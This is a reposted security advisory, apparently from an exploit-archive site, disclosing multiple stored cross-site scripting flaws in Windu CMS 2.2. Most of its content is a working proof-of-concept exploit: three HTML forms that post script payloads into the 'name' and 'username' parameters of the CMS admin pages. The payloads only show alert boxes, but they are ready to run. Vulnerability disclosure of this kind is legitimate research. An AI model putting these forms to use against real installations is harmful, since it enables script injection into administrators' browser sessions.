Windu CMS 2.2 Multiple Persistent Cross-Site Scripting Vulnerabilities

2013-07-24 / 2013-07-25

Credit: Gjoko 'LiquidWorm' Krstic

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

<!--
Windu CMS 2.2 Multiple Persistent Cross-Site Scripting Vulnerabilities
Vendor: Adam Czajkowski
Product web page: http://www.windu.org
Affected version: 2.2 rev 1430
Summary: Windu CMS is a simple, lightweight and fun-to-use
website content management software.
Desc: Multiple stored XSS vulnerabilities exist when parsing
user input to the 'name' and 'username' POST parameters.
Attackers can exploit these weaknesses to execute arbitrary
HTML and script code in a user's browser session.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Apache 2.4.2 (Win32)
PHP 5.4.7
MySQL 5.5.25a
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2013-5148
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5148.php
21.07.2013
-->
<html>
<head>
<title>Windu CMS 2.2 Multiple Persistent Cross-Site Scripting Vulnerabilities</title>
</head>
<body><center><br />
<form method="POST" action="http://localhost/winducms/admin/content/edit/659/?mn=admin.message.error">
<input type="hidden" name="name" value='"><script>alert(1);</script>' />
<input type="hidden" name="form_key" value="addLang" />
<input type="submit" value="XSS #1" />
</form>
<br />
<form method="POST" action="http://localhost/winducms/admin/content/add/760/?mn=admin.message.error">
<input type="hidden" name="name" value='"><script>alert(2);</script>' />
<input type="hidden" name="type" value="1" />
<input type="hidden" name="form_key" value="add" />
<input type="submit" value="XSS #2" />
</form>
<br />
<form method="POST" action="http://localhost/winducms/admin/users/?mn=admin.message.error">
<input type="hidden" name="type" value="17" />
<input type="hidden" name="email" value="lab@zeroscience.mk" />
<input type="hidden" name="password" value="testing...1.2.3" />
<input type="hidden" name="passwordCompare" value="testing...1.2.3" />
<input type="hidden" name="username" value='"><script>alert(3);</script>' />
<input type="hidden" name="name" value="Zero Science Lab" />
<input type="hidden" name="surname" value="ZSL" />
<input type="hidden" name="form_key" value="addUserSystem" />
<input type="submit" value="XSS #3" />
</form>
</body>
</html>

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5148.php

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Windu CMS 2.2 Multiple Persistent Cross-Site Scripting Vulnerabilities

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.